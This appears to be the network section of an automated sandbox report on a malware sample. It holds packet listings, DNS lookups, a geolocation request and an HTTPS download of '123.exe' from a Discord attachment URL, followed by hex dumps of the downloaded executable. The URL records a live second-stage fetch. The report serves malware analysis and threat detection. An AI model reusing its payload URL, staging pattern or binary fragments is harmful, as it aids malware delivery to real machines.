                                                                                                                                                                                Oct 19, 2021 07:23:21.444885015 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:21.596010923 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.743576050 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:21.787184000 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:22.256017923 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:22.256154060 CEST4434977545.130.41.15192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:22.257642031 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:22.260333061 CEST49775443192.168.2.445.130.41.15
                                                                                                                                                                                Oct 19, 2021 07:23:25.386043072 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:25.414872885 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:25.468391895 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:25.823709965 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:25.851562023 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:25.904165983 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:26.581532955 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:26.610085964 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:26.626249075 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:26.654378891 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:26.678697109 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:26.707294941 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:26.749679089 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:27.649184942 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:27.685688019 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:27.711004972 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:27.740799904 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:27.742285967 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:27.771265984 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:27.812251091 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.153490067 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.181840897 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.234205961 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.845312119 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.873303890 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.873332977 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.873462915 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.873495102 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.873537064 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.873559952 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.873605013 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.873673916 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.873883009 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.873948097 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.874082088 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.874165058 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.901020050 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.901144028 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.901242971 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.901299000 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.901334047 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.901468039 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.901479006 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.901611090 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.901799917 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.901937962 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.901946068 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.902040958 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.902235031 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.902344942 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.902463913 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.902591944 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.902774096 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.902899027 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.902918100 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.902992010 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.903106928 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.903287888 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.903403997 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.903479099 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.931735039 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.931780100 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.931989908 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.932015896 CEST4977456316192.168.2.4185.244.217.166
                                                                                                                                                                                Oct 19, 2021 07:23:28.932061911 CEST5631649774185.244.217.166192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:28.932104111 CEST5631649774185.244.217.166192.168.2.4

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 19, 2021 07:23:21.153292894 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                                Oct 19, 2021 07:23:21.229990005 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                                Oct 19, 2021 07:23:31.146524906 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                                Oct 19, 2021 07:23:31.167860031 CEST53623898.8.8.8192.168.2.4

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                Oct 19, 2021 07:23:21.153292894 CEST192.168.2.48.8.8.80xdce4Standard query (0)by.greentry.siteA (IP address)IN (0x0001)
                                                                                                                                                                                Oct 19, 2021 07:23:31.146524906 CEST192.168.2.48.8.8.80xc59fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                Oct 19, 2021 07:23:21.229990005 CEST8.8.8.8192.168.2.40xdce4No error (0)by.greentry.site45.130.41.15A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 19, 2021 07:23:31.167860031 CEST8.8.8.8192.168.2.40xc59fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 19, 2021 07:23:31.167860031 CEST8.8.8.8192.168.2.40xc59fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 19, 2021 07:23:31.167860031 CEST8.8.8.8192.168.2.40xc59fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 19, 2021 07:23:31.167860031 CEST8.8.8.8192.168.2.40xc59fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                Oct 19, 2021 07:23:31.167860031 CEST8.8.8.8192.168.2.40xc59fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • by.greentry.site
                                                                                                                                                                                • cdn.discordapp.com

                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.2.44977545.130.41.15443C:\Users\user\Desktop\MVB56JJDeJ.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-19 05:23:21 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                Host: by.greentry.site
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-10-19 05:23:22 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx-reuseport/1.21.1
                                                                                                                                                                                Date: Tue, 19 Oct 2021 05:23:22 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 76
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Powered-By: PHP/7.4.8
                                                                                                                                                                                2021-10-19 05:23:22 UTC0INData Raw: 0a 7b 22 63 69 74 79 22 3a 22 52 65 73 74 6f 6e 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 70 6f 73 74 61 6c 22 3a 22 36 33 33 31 22 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 33 22 7d
                                                                                                                                                                                Data Ascii: {"city":"Reston","country_code":"US","postal":"6331","ip":"102.129.143.33"}


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.2.449776162.159.135.233443C:\Users\user\Desktop\MVB56JJDeJ.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-19 05:23:31 UTC0OUTGET /attachments/897970496841347094/899319021416116294/123.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                2021-10-19 05:23:31 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Tue, 19 Oct 2021 05:23:31 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 3432464
                                                                                                                                                                                Connection: close
                                                                                                                                                                                CF-Ray: 6a0793283ff542c9-FRA
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Age: 135533
                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                Content-Disposition: attachment;%20filename=123.exe
                                                                                                                                                                                ETag: "8a0fae504673180e1bb94c93260c2d7f"
                                                                                                                                                                                Expires: Wed, 19 Oct 2022 05:23:31 GMT
                                                                                                                                                                                Last-Modified: Sun, 17 Oct 2021 15:32:43 GMT
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                x-goog-generation: 1634484763347508
                                                                                                                                                                                x-goog-hash: crc32c=B4AC3Q==
                                                                                                                                                                                x-goog-hash: md5=ig+uUEZzGA4buUyTJgwtfw==
                                                                                                                                                                                x-goog-metageneration: 1
                                                                                                                                                                                x-goog-storage-class: STANDARD
                                                                                                                                                                                x-goog-stored-content-encoding: identity
                                                                                                                                                                                x-goog-stored-content-length: 3432464
                                                                                                                                                                                X-GUploader-UploadID: ADPycdsPp1ooWQDF8yX3zjejaN22ih4AWTMQBfHcdE2R-43JAhh8lou1_VugTKaI1mGjLGIQABubDoVA50h12mrA9cB868IJWg
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                2021-10-19 05:23:31 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4e 42 4a 65 33 78 49 57 4b 69 54 65 72 71 71 64 35 78 78 42 56 7a 25 32 46 6f 54 72 37 65 38 79 4d 65 33 41 66 25 32 42 52 4a 46 33 78 50 73 25 32 42 55 58 54 65 5a 35 25 32 42 63 69 4d 4b 70 4a 6a 41 38 33 6c 78 69 4a 78 6a 4b 78 78 43 51 46 71 68 6d 6c 71 49 44 76 4a 5a 71 36 4b 4e 38 79 50 48 42 69 39 50 30 63 4c 71 65 54 52 50 45 76 6e 4e 41 33 6d 48 76 42 79 63 67 47 71 76 58 76 6e 56 35 55 55 6e 6d 59 50 33 73 6e 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBJe3xIWKiTerqqd5xxBVz%2FoTr7e8yMe3Af%2BRJF3xPs%2BUXTeZ5%2BciMKpJjA83lxiJxjKxxCQFqhmlqIDvJZq6KN8yPHBi9P0cLqeTRPEvnNA3mHvBycgGqvXvnV5UUnmYP3snQ%3D%3D"}],"group":"cf-nel","max_age
                                                                                                                                                                                2021-10-19 05:23:31 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 e6 e5 69 61 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 08 00 00 3a 0f 00 00 94 04 00 00 00 00 00 30 bc 51 00 00 20 00 00 00 60 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 7d 00 00 04 00 00 a6 07 35 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELia.:0Q `@ }5@
                                                                                                                                                                                2021-10-19 05:23:31 UTC3INData Raw: 36 5f 1b 25 48 5a 0c f2 ce e8 0b f0 44 6d 24 5f 57 81 0a 6f 78 1b 61 5a 18 49 27 7e ef 74 3b f2 a7 8f b0 65 91 2b 3b 2f 5f d6 1b 65 9d 6f b7 dc fb 1e 2a 8c 7f e5 e2 50 78 65 df a0 ce 2d d0 43 1d 3f 45 2d 3f 11 c3 88 5f a6 14 5b dd 86 df 68 50 74 11 58 d9 56 40 40 ea 65 13 61 c8 84 80 e5 cb 12 0a 28 59 c0 71 6f 0b 89 13 68 3f cc da d4 58 cf e9 7a a1 8c 2d 6d 20 2c 36 f8 23 45 13 96 f3 5f 13 65 8c 57 88 6d c9 59 c0 5d 26 bd 9c 26 f8 34 81 f4 cd 51 51 80 48 58 5f e8 68 ee af 19 7c c7 58 e9 42 57 e2 30 24 50 24 5d 8d 6d 13 63 42 74 4f 00 a1 5a 4a 97 a5 87 47 fd 4c 54 71 26 46 d8 9c 1f 8c 3f af 2e a7 6b 99 fa 3b 5a 11 20 44 d0 bb 59 87 fa 22 e0 95 2c 81 d9 60 35 24 7c 52 7c 92 73 55 24 18 63 24 08 ca d1 26 1e d5 32 4e 0b 90 5a 34 c8 c8 19 2a 5f 3b 73 13 fe bc
                                                                                                                                                                                Data Ascii: 6_%HZDm$_WoxaZI'~t;e+;/_eo*Pxe-C?E-?_[hPtXV@@ea(Yqoh?Xz-m ,6#E_eWmY]&&4QQHX_h|XBW0$P$]mcBtOZJGLTq&F?.k;Z DY",`5$|R|sU$c$&2NZ4*_;s
                                                                                                                                                                                2021-10-19 05:23:31 UTC4INData Raw: 3b 37 29 4f d1 cd 3d a5 8c 02 c1 3a 32 66 5a a3 64 39 67 2d 1e 3b 88 cd 1f 31 6b bc a3 6c 71 20 d6 ea 5f fa 35 94 88 67 1d ac 68 92 07 55 b0 97 a1 55 fe df 58 3f 8c cf ee cb 18 a1 5a ec 6d 47 15 ff 41 39 d6 8b 5d a0 5e 85 26 4e 0a b5 68 43 69 0c d8 0f db 4f ff 38 6c f0 60 31 63 ea e9 49 d4 37 66 51 17 70 fa 10 10 44 40 b2 75 11 96 11 ee 04 5f 5c 6a c5 3c 5d 39 31 6e c9 0b 3d 6c 5a e8 05 ff 8f 91 1a 6f 6e a4 48 ed 05 5f 67 05 32 85 71 5d 40 2a 2b 84 02 62 7b ba 0b 56 06 38 fc ef 8f 6b 48 80 2c 14 63 aa 0d 26 5f fe 0c 6d 22 77 11 ee 6f 26 4b 4d be 8a 67 ff 8f 2c 47 a6 50 1c ff 40 7a d1 99 3d cf 0f 2f 7a 42 7e 22 65 59 bd 8d 9f a2 8b 30 b6 26 1e 28 1a ac 58 09 a0 64 55 70 12 c1 d8 7a 10 2e 20 10 d8 37 81 af 4a f8 69 a4 9d 6c 65 a1 6a 5f 20 f4 aa 27 ac 8b 96
                                                                                                                                                                                Data Ascii: ;7)O=:2fZd9g-;1klq _5ghUUX?ZmGA9]^&NhCiO8l`1cI7fQpD@u_\j<]91n=lZonH_g2q]@*+b{V8kH,c&_m"wo&KMg,GP@z=/zB~"eY0&(XdUpz. 7Jilej_ '
                                                                                                                                                                                2021-10-19 05:23:31 UTC5INData Raw: 5b 80 35 51 20 72 c8 8b 57 4f c6 d0 14 dd f3 54 3e d5 5f 44 21 6e 2a 67 17 59 6a 2c c9 7d 42 50 60 bd 25 0b 71 74 7c 51 74 fa 89 79 10 e7 e0 8f 12 6a 22 eb bc 9b 59 c2 d4 d2 ae 97 20 6c 71 a6 3b 39 f8 ff d3 7f c6 af 0f 96 f2 b2 67 6d 52 e7 11 8e 58 b3 98 f7 cd 50 0b 6a f6 f6 ad 86 54 e5 87 b1 2d 0a e5 77 23 7f 5a 04 f1 87 bc 10 5d 38 50 40 df b7 a7 82 5a 51 13 71 c2 ec 75 a7 22 d2 dd 1c 59 8c 22 20 94 8f 35 6d 53 e7 27 b5 97 8c 23 1a 2d 74 10 ba f6 43 95 73 0b cf 0e 28 34 2b 44 eb 55 73 dd 8c c5 16 dd c0 59 45 c7 26 de 75 87 7d c3 cf dc d6 97 ab 0d 7d b0 8f f3 17 ad cd 75 39 a6 29 14 9d f1 53 7e 00 75 50 8c ae dd 56 b4 ef db 05 d4 9c 55 38 2e e9 3a 58 e4 ec f1 74 00 4e 11 b6 05 8f ec ef 77 87 7c 90 bc 50 f1 d9 64 70 5e 0d 74 86 96 74 bd e8 dd 20 e9 ba 47
                                                                                                                                                                                Data Ascii: [5Q rWOT>_D!n*gYj,}BP`%qt|Qtyj"Y lq;9gmRXPjT-w#Z]8P@ZQqu"Y" 5mS'#-tCs(4+DUsYE&u}}u9)S~uPVU8.:XtNw|Pdp^tt G
                                                                                                                                                                                2021-10-19 05:23:31 UTC7INData Raw: 88 0e 81 a0 db f1 5e b9 72 47 8e d1 31 c2 a0 d1 0f ae 3f 9c e4 98 99 0c b6 93 a6 14 de d8 38 5e ee 84 7a bb 45 a3 7b 7c 77 c0 90 73 7c 32 7c e2 30 8d 85 fb 83 79 27 21 95 d4 f7 24 d3 5f 83 7a a5 5b 77 37 a5 7f e7 66 b1 52 94 70 62 37 93 6f e6 5e d9 00 4a 8a 24 70 70 e7 47 51 26 e0 c1 62 aa ec 8b c3 92 ea b6 62 f1 5b a8 81 73 d0 85 d7 27 af de a3 fe 02 d8 aa a4 e3 79 af 1c 29 a0 bb 2f 5e ea 0c 56 08 4b 19 41 6f 2c c7 ad e3 0a 00 b9 a9 54 4d f2 bd 49 59 ea 4b 94 38 35 e3 8c 7a 70 32 c5 c6 c5 b9 e7 6c c3 3d 4b 03 86 e6 85 8c b6 00 4a 39 17 f9 2b e4 a4 25 13 a7 24 65 12 4d f6 92 9d 56 6d 5c 69 0b 93 22 1d 2e e5 d9 23 66 60 6f ed 1c d8 d4 fb 10 1f b2 67 7a e7 70 01 22 95 f5 88 21 7e 50 86 a1 9d d0 5a f6 e5 bd ab c7 6f 44 82 a1 9d da da 0d c0 98 20 20 c1 45 e5
                                                                                                                                                                                Data Ascii: ^rG1?8^zE{|ws|2|0y'!$_z[w7fRpb7o^J$ppGQ&bb[s'y)/^VKAo,TMIYK85zp2l=KJ9+%$eMVm\i".#f`ogzp"!~PZoD E
                                                                                                                                                                                2021-10-19 05:23:31 UTC8INData Raw: e0 47 14 b4 f4 54 df 61 4e e8 32 a4 71 5d 3a 7e 9b cf 8c e6 c0 6f df ab 6c 6d eb d9 a4 90 0e ab 5f 49 1f 2f 8a ba 17 85 2a 26 4d e9 38 41 1f 28 4e cf 30 24 e4 59 ce f1 21 30 71 3a 2d 35 6d 80 7a 5e 1b 2c 20 37 c3 84 ef 2b 2e ed 3b 09 2c 86 6c 89 21 63 ae dd 8b 70 62 ee 40 3f 09 35 73 14 5b 76 88 6e 85 e4 20 7e 36 c3 2a 86 69 7d ce 84 fc e0 58 80 2e 7a 0b 6f b3 93 6f 50 d3 16 47 9d 58 5b 56 3e a2 29 9d bb 88 43 1b 36 34 7c 5e 9b 29 5f 0d 6b d4 d9 74 65 25 8c 09 e0 30 9d c7 80 2a 2e ad 27 02 59 2f 6d 3a 74 f7 5d e5 3d f0 0b f6 7b e5 16 fa a4 99 74 41 89 0c ef 45 cc c1 03 d1 e2 01 a2 21 24 50 8e 88 57 13 23 d9 e5 51 e0 f5 5f 4b 1b 28 38 1d b6 72 8c 46 e5 da 8a 16 6e 49 6c e3 e9 2c d0 1b 2e d8 a5 10 3d 10 d0 7b 6b fd 0d 70 49 61 47 a4 d1 4f 81 30 9d 50 83 0c
                                                                                                                                                                                Data Ascii: GTaN2q]:~olm_I/*&M8A(N0$Y!0q:-5mz^, 7+.;,l!cpb@?5s[vn ~6*i}X.zooPGX[V>)C64|^)_kte%0*.'Y/m:t]={tAE!$PW#Q_K(8rFnIl,.={kpIaGO0P
                                                                                                                                                                                2021-10-19 05:23:31 UTC9INData Raw: 58 78 ca 51 75 a8 e8 d3 b7 50 00 4f 15 73 52 e2 de 21 da 3b ba b9 28 1b db 05 51 84 88 3d 70 52 15 4e 22 20 3d 2a 86 7e 79 52 34 2d cc 3c 37 af 8d 4a 28 4c 13 85 28 2a 22 bd 2e 1a bd ba e5 33 50 7b e0 6a dc 0c ec e3 14 27 8d 60 83 0b 44 7c bf 16 19 e5 e6 a9 cf 8d 75 11 e3 c9 2b 35 98 2d b8 b3 7e 47 d7 76 40 71 bd 24 43 a2 63 f4 96 57 8e 5e 76 29 4f a4 2b 60 5f 1f f5 8a 77 0f 26 6b 67 1d 7e 4d 58 05 2a 36 8b 01 da 74 62 18 60 ff 35 62 e6 2c bd bb 86 fd db 6e 2e 02 5f 7c 8f d8 c3 3b 73 bf fc 1f cc 12 65 a4 72 c1 ee 7c 98 27 26 91 27 ad b2 37 aa fb 27 3f 0c f0 4a 10 7f 0f 65 12 60 1a 5e 78 68 4c 5d 16 7e 36 f6 5a fc fb e6 0b f2 1b 63 ac ea 35 cf 39 77 2a 6f 7d 35 d0 1c 13 52 59 5f 05 19 e7 23 be b5 7a 81 e8 74 92 6e c1 dc e4 32 32 b0 20 4a 4f e4 c8 cf 21 57
                                                                                                                                                                                Data Ascii: XxQuPOsR!;(Q=pRN" =*~yR4-<7J(L(*".3P{j'`D|u+5-~Gv@q$CcW^v)O+`_w&kg~MX*6tb`5b,n._|;ser|'&'7'?Je`^xhL]~6Zc59w*o}5RY_#ztn22 JO!W
                                                                                                                                                                                2021-10-19 05:23:31 UTC11INData Raw: ca 36 76 ea 86 70 b2 05 aa 90 14 98 cc 18 bf 97 58 ca 58 e0 fc 7d f7 0b 22 e2 4c a8 21 a0 fd ed 1c 65 ff 9f cd f8 81 81 24 3e 59 6d af 32 3b 21 84 95 26 2a 0c f6 0a 8f be 92 7e 0a b3 19 b5 68 f4 6d 48 77 c0 8f ba 48 b5 3b 79 b0 af 4b fe e6 36 95 93 ad b9 3b 66 6c 3c 86 67 3e 70 4b 06 98 1f d8 78 98 38 6e d4 53 38 61 31 de ac 46 8e cf 8c d4 76 a5 37 3b 5f 30 89 d8 62 6a f4 d9 7b 68 4c a8 6b 74 b8 fa 78 ed 10 63 d1 6b 15 32 5b 7b aa a5 b8 6c 30 68 ce 14 38 81 20 57 37 66 9e e4 ae 06 57 3d 56 dc 2d 03 1c 46 c7 85 22 ac 07 e5 19 89 92 15 1a bf 49 80 3b 3f b4 33 43 db bc 77 cb 0a 82 f9 32 f0 8e c4 56 20 cf 87 36 2f 5e 6f 98 10 59 6a bb 19 32 2b b7 b6 33 14 66 e8 2d 8f e5 7e c2 24 16 49 52 7f 86 99 f4 3d 01 35 e3 5c 1b 44 6c 8d 4e 83 c5 41 3a 94 2e 90 87 18 2d
                                                                                                                                                                                Data Ascii: 6vpXX}"L!e$>Ym2;!&*~hmHwH;yK6;fl<g>pKx8nS8a1Fv7;_0bj{hLktxck2[{l0h8 W7fW=V-F"I;?3Cw2V 6/^oYj2+3f-~$IR=5\DlNA:.-
                                                                                                                                                                                2021-10-19 05:23:31 UTC12INData Raw: 98 97 27 68 75 b5 1a 47 10 cd 77 1e 5b 70 5e 3b 67 d8 5c ab 78 c8 21 72 83 79 ea 70 7a d7 62 6d be b6 7d df 91 29 6c 8d 9e c5 1e 56 ec a0 75 6a 68 42 74 bf d5 c4 76 d9 61 1e e8 c5 eb fa 37 1c 3d c4 99 cc 25 53 b3 1c b7 48 fb 3b 67 fc 01 ee d5 61 ae fe b9 5a 58 c2 1c 22 fd 1b 13 a1 4c 63 2e e2 8e 71 22 22 0e 76 83 f6 69 75 e6 61 df 26 df 5f 08 1b 63 60 e2 02 80 9a 30 cd 05 8c 70 1b 46 32 8b 60 65 f3 7d 9c 67 df 1a d1 57 02 27
                                                                                                                                                                                Data Ascii: 'huGw[p^;g\x!rypzbm})lVujhBtva7=%SH;gaZX"Lc.q""viua&_c`0pF2`e}gW'
